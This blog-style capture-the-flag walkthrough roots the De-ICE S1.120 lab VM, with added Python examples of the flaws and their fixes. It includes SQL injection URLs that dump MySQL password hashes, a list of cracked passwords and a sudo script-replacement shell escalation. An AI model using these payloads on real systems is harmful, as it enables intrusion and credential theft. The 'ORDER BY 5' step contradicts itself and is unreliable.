Mr_H4sh

Infosec, CTF and more

De-ICE S1.120 Solution

In this post I’m going to show you how to solve the De-ICE VM 1.120 provided by the Hacking Dojo Team.

You can find the VM at this link

The goal of the VM is to gain root access to the machine.

The VM has DHCP enabled, although it will take the IP address 192.168.1.120, so make sure that you have set up a network with the range 192.168.1.x.

Attacker: 192.168.1.1
Victim: 192.168.1.120

I run nmap against the victim, and this is what I get:

# Nmap 7.01 scan initiated Tue Mar 21 04:58:09 2017 as: nmap -sS -sV -p- -Pn -n -v -oA nmap_syn_version_full_192.168.1.120 -T5 192.168.1.120
Warning: 192.168.1.120 giving up on port because retransmission cap hit (2).
Increasing send delay for 192.168.1.120 from 0 to 5 due to 2996 out of 7489 dropped probes since last increase.
Nmap scan report for 192.168.1.120
Host is up (0.00024s latency).
Not shown: 65521 closed ports
PORT      STATE    SERVICE  VERSION
21/tcp    open     ftp      ProFTPD 1.3.2
22/tcp    open     ssh      OpenSSH 5.1 (protocol 2.0)
80/tcp    open     http     Apache httpd 2.2.11 ((Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0)
443/tcp   open     ssl/http Apache httpd 2.2.11 ((Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0)
3306/tcp  open     mysql    MySQL (unauthorized)
11123/tcp filtered unknown
19591/tcp filtered unknown
22721/tcp filtered unknown
25538/tcp filtered unknown
33762/tcp filtered unknown
35385/tcp filtered unknown
37809/tcp filtered unknown
44970/tcp filtered unknown
53545/tcp filtered unknown
MAC Address: 00:0C:29:E5:A2:C8 (VMware)
Service Info: OS: Unix

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 21 05:09:15 2017 -- 1 IP address (1 host up) scanned in 666.53 seconds

I open the URL http://192.168.1.120/ in a browser, and I find a small CMS. I add a product through the URL http://192.168.1.120/add_product.php and then I go to http://192.168.1.120/products.php?id=1 to see my product.

I see that the id parameter in the query string is vulnerable to SQL injection:

http://192.168.1.120/products.php?id=1%20ORDER%20BY%205# => returns the product
http://192.168.1.120/products.php?id=1%20ORDER%20BY%205# => doesn't return anything
http://192.168.1.120/products.php?id=1%20OR%201=1# => returns the product
http://192.168.1.120/products.php?id=1%20UNION%20SELECT%201,2,3,4,5# => we see that the shown fields are the 2,3 and 4
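The flaw those probes reveal, as an added example that is not the CMS's own code: the id value is concatenated into the query, so a UNION appended to it pulls rows from another table into the three rendered fields. An in-memory sqlite3 database stands in for the CMS's MySQL here, and because sqlite lacks MySQL's `#` comment the payloads end with `-- ` instead.

```python
import sqlite3

# Five columns, matching the UNION SELECT 1,2,3,4,5 probe on the page.
SELECT = "SELECT id, name, description, price, extra FROM products WHERE id="


def make_db():
    """Constructed in-memory stand-in for the CMS database (not the real one)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, description TEXT,
                              price TEXT, extra TEXT);
        INSERT INTO products VALUES (1, 'widget', 'a test product', '$4.00', '');
        -- stands in for mysql.user; the hash value is a constructed placeholder
        CREATE TABLE user(user TEXT, password TEXT);
        INSERT INTO user VALUES ('webapp', '*PLACEHOLDERHASH');
    """)
    return db


def products_vulnerable(db, id_param):
    """Mirrors the flaw: the raw id string is concatenated into the SQL text."""
    return db.execute(SELECT + id_param).fetchall()


def products_fixed(db, id_param):
    """Hardened form: reject anything non-numeric, then bind the value."""
    if not id_param.isdigit():
        return []
    return db.execute(SELECT + "?", (int(id_param),)).fetchall()


def render(rows):
    """products.php displays columns 2, 3 and 4 as Product, Description, Price."""
    return [(row[1], row[2], row[3]) for row in rows]


def leak_accounts(db):
    """The mysql.user payload from the post, with '-- ' in place of MySQL's '#'."""
    payload = "1 UNION SELECT 1,user,password,4,5 FROM user-- "
    return render(products_vulnerable(db, payload))


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", leak_accounts(db))
    print("fixed:", render(products_fixed(db,
          "1 UNION SELECT 1,user,password,4,5 FROM user-- ")))
```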

At this point I go ahead and check if there’s any useful information in the database:

http://192.168.1.120/products.php?id=1%20UNION%20SELECT%201,version(),user(),database(),5# => returns the following:

Product: 5.1.33

Desription: webapp@localhost

Price: $merch

Using the same method, I find that the webapp user can read the mysql database, including the mysql.user table. This way, I fetch the password hash of every account in the database:

http://192.168.1.120/products.php?id=1%20UNION%20SELECT%201,user,password,4,5%20FROM%20mysql.user# => returns one product entry per MySQL account, with the username in the Product field and the password hash in the Description field:

Quite a few users and passwords. I crack the passwords with john, and this is what I get:

root@kali:~/Desktop/lab/de-ice-1-120# cat passwords.txt 
password         (mrodriguez)
12345678         (djohnson)
computer         (jalvarez)
qwerty           (ccoffee)
internet         (tdeleon)
shadow           (mbryan)
baseball         (dcooper)
letmein          (kclemons)
jordan           (tgoodchap)
michael          (aspears)
soccer           (lmorales)
iloveyou         (rpatel)
jennifer         (aadams)
master           (dtraylor)
monkey           (krenfro)
pepper           (lmartinez)
whatever         (aweiland)
111111           (kwebber)
666666           (cchisholm)
princess         (rjacobson)
superman         (rdominguez)
123123           (aallen)
cheese           (sgains)
starwars         (jalcantar)
Password         (jduff)
nintendo         (sjohnson)
blahblah         (dstevens)
passw0rd         (dwestling)
0                (bwatkins)
babyl0n          (jdavenport)
gizmodo          (qpowers)
consumer         (bphillips)
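Why john gets through them so quickly, as an added example that is not from the post: the `*` followed by 40 hex digits is the MySQL 4.1+ PASSWORD() format, an unsalted SHA1(SHA1(password)), so recomputing it over a wordlist costs two hash calls per guess, and identical hashes reveal shared passwords without cracking anything. mrodriguez's hash is copied from the dump; the other accounts and their password are constructed.

```python
import hashlib
import re

MYSQL41_RE = re.compile(r"^\*[0-9A-F]{40}$")


def is_mysql41_hash(value):
    """MySQL 4.1+ PASSWORD() output: '*' followed by 40 uppercase hex digits."""
    return bool(MYSQL41_RE.match(value))


def mysql41_hash(password):
    """Recompute PASSWORD(): '*' + SHA1(SHA1(password)); no per-user salt."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def shared_password_groups(accounts):
    """Unsalted hashes collide exactly when passwords are equal, so grouping
    the dump by hash exposes shared passwords. Returns {hash: [users]} for
    every hash used by more than one account."""
    groups = {}
    for user, h in accounts:
        groups.setdefault(h, []).append(user)
    return {h: users for h, users in groups.items() if len(users) > 1}


# Constructed sample dump: mrodriguez's hash is the one from the post (john
# reported "password" for it); alice and bob are made up and share a password.
SHARED_HASH = mysql41_hash("constructed-example")
SAMPLE_DUMP = [
    ("mrodriguez", "*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19"),
    ("alice", SHARED_HASH),
    ("bob", SHARED_HASH),
]


if __name__ == "__main__":
    print(mysql41_hash("password") == SAMPLE_DUMP[0][1])  # True
    print(shared_password_groups(SAMPLE_DUMP))
```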

All of these users can log in to the system. I log in as most of them to check whether any of them has root privileges or anything interesting.

Of all the users, ccoffee has a script with the SUID bit set at /home/ccoffee/scripts/getlogs.sh.

He can also run the same script through sudo, without a password:

ccoffee@slax:~$ sudo -l
User ccoffee may run the following commands on this host:
    (root) NOPASSWD: /home/ccoffee/scripts/getlogs.sh

This is a good opportunity to change the content of getlogs.sh, although it’s not as straightforward as editing it in place: the file is owned by root and not writable by ccoffee, but the scripts directory it lives in is, so the file can be renamed and replaced.

I move getlogs.sh to getlogs.sh.old and create a new getlogs.sh containing a Python one-liner that spawns a shell. Since the script runs through sudo, the spawned shell runs as root:

ccoffee@slax:~/scripts$ mv getlogs.sh getlogs.sh.old
ccoffee@slax:~/scripts$ ls -l
total 4
-rws--x--x 1 root admin 110 Mar 21 04:55 getlogs.sh.old*
ccoffee@slax:~/scripts$ echo "python -c 'import pty;pty.spawn(\"/bin/bash\")'" > getlogs.sh
ccoffee@slax:~/scripts$ cat getlogs.sh
cat getlogs.sh
python -c 'import pty;pty.spawn("/bin/bash")'
ccoffee@slax:~/scripts$ chmod +x getlogs.sh
ccoffee@slax:~/scripts$ sudo /home/ccoffee/scripts/getlogs.sh
bash-3.1# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),17(audio),18(video),19(cdrom),26(tape),83(plugdev)
bash-3.1# 

This is it, root privileges gained.
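A defender's check for the misconfiguration that made this work, added here and not part of the post: a NOPASSWD sudo target is only as trustworthy as the least-protected directory on its path. The `sudo -l` text is the post's; the ownership and modes are a constructed snapshot (the script's mode is from the listing, the directory ownership is assumed from the fact that the `mv` succeeds), so a real audit would replace the dict with os.stat calls.

```python
import stat

# Constructed filesystem snapshot: (owner, mode) per path. The script itself
# is root-owned 4711 as in the post's listing; /home/ccoffee and its scripts
# directory are assumed to belong to ccoffee.
FAKE_FS = {
    "/": ("root", 0o755),
    "/home": ("root", 0o755),
    "/home/ccoffee": ("ccoffee", 0o755),
    "/home/ccoffee/scripts": ("ccoffee", 0o755),
    "/home/ccoffee/scripts/getlogs.sh": ("root", 0o4711),
}

SUDO_L_OUTPUT = """User ccoffee may run the following commands on this host:
    (root) NOPASSWD: /home/ccoffee/scripts/getlogs.sh
"""


def parse_sudo_l(text):
    """Extract (runas, command path) pairs from `sudo -l` style output."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("("):
            runas, rest = line[1:].split(")", 1)
            cmd = rest.split(":", 1)[-1].strip().split()[0]
            entries.append((runas.strip(), cmd))
    return entries


def path_chain(path):
    """'/a/b/c' -> ['/', '/a', '/a/b', '/a/b/c']"""
    parts = path.strip("/").split("/")
    return ["/"] + ["/" + "/".join(parts[:i + 1]) for i in range(len(parts))]


def writable_by(user, owner, mode):
    """Owner write bit for this user, or world-writable (group bits ignored)."""
    return bool((owner == user and mode & stat.S_IWUSR) or mode & stat.S_IWOTH)


def audit(user, sudo_text, fs):
    """Commands the user could swap out: the file or any ancestor directory is
    writable by the user, which allows a rename-and-replace even when the
    file itself is root-owned. Returns [(command, offending path)]."""
    findings = []
    for _runas, cmd in parse_sudo_l(sudo_text):
        for p in path_chain(cmd):
            if p in fs and writable_by(user, *fs[p]):
                findings.append((cmd, p))
                break
    return findings


if __name__ == "__main__":
    print(audit("ccoffee", SUDO_L_OUTPUT, FAKE_FS))
```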

Thank you to the HackingDojo Team for the VM and to Vulnhub for hosting it. If you have any questions or comments, please do not hesitate to leave a comment.